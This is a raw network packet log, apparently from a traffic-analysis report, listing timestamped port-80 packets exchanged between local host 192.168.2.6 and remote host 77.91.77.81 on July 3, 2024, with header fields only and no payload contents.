Jul 3, 2024 18:09:07.124669075 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.124717951 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.124717951 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125107050 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125119925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125135899 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125160933 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125174999 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125248909 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125262976 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125273943 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125284910 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125297070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125315905 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125406981 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125420094 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125431061 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125457048 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125469923 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125570059 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125581026 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125591993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125607014 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125618935 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125623941 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125633001 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125634909 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125644922 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125655890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125663996 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125668049 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125680923 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125690937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125705957 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125716925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.125720024 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125735998 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125761032 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.125971079 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126033068 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126117945 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126132011 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126142979 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126153946 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126166105 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126177073 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126188993 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126260042 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126460075 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126471996 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126482964 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126499891 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126512051 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126523972 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126535892 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126548052 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126559019 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126559019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126559019 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126559019 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126581907 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126601934 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126635075 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126648903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126660109 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126671076 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126673937 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126682997 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126693964 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126696110 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126710892 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.126720905 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126754045 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.126773119 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.127120972 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.127132893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.127144098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.127182961 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.127262115 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.127279043 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.127290964 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.127301931 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.127306938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.127312899 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.127325058 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.127347946 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.127384901 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148350000 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148361921 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148371935 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148377895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148384094 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148392916 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148405075 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148447990 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148468018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148478031 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148488045 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148499012 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148510933 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148519039 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148523092 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148535967 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148546934 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148555040 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148559093 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148580074 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148582935 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148605108 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148605108 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148622990 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148634911 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148646116 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148657084 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148668051 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148672104 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148683071 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148694992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148705006 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148715019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148726940 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148737907 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148719072 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148719072 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148719072 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148719072 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148763895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148789883 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148789883 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148789883 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148802996 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148814917 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148833036 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148850918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148863077 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148873091 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148873091 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148875952 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148883104 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.148885012 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148932934 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.148972988 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.149034023 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.149305105 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.149363995 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.190828085 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.190872908 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.190886021 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.190913916 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.190913916 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.190942049 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.191467047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.191483974 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.191495895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.191502094 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.191539049 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.191554070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.212332964 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.212343931 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.212356091 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.212384939 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.212413073 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.212471962 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.212491035 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.212527037 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.212549925 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.212603092 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.212640047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.212650061 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.212686062 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.212908983 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.212929010 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.212939978 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.212955952 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.212966919 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.212982893 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213152885 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213165045 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213177919 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213200092 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213232040 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213264942 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213278055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213290930 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213303089 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213311911 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213327885 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213354111 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213408947 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213419914 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213511944 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213530064 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213541985 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213552952 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213565111 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213567972 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213577032 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213596106 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213629961 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213927984 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213975906 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.213979959 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.213993073 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214019060 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214031935 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214056969 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214068890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214078903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214091063 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214101076 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214128971 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214262962 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214273930 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214284897 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214296103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214307070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214327097 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214350939 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214488983 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214499950 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214510918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214515924 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214521885 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214528084 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214530945 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214534044 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214540958 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214550018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214595079 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214787006 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214798927 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214809895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214826107 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214858055 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214931965 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214943886 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214953899 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214967012 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214968920 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.214978933 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214997053 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.214998007 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215008020 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215020895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215032101 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215032101 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215040922 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215045929 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215054989 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215059996 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215085983 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215107918 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215403080 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215415955 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215426922 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215446949 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215468884 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215498924 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215512037 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215523005 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215533972 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215536118 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215547085 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215550900 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215559959 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215570927 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215572119 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215581894 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.215601921 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.215620995 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235306978 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235335112 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235348940 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235353947 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235378027 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235394001 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235420942 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235431910 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235445976 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235457897 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235457897 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235474110 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235502005 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235538006 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235577106 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235596895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235608101 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235635042 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235650063 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235728979 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235745907 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235757113 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235768080 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235768080 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235778093 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235799074 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235862017 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235893965 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235909939 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235920906 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.235935926 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.235958099 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.236129045 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236140966 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236151934 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236162901 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236174107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236174107 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.236186981 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236197948 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236201048 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.236212015 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236222982 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236226082 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.236233950 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236242056 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.236248970 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.236258030 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.236284018 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.237360954 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.237373114 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.237384081 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.237405062 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.237418890 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.237452030 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.237462997 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.237479925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.237489939 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.237490892 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.237504005 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.237525940 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.281687975 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.281701088 CEST	80	62923	77.91.77.81	192.168.2.6
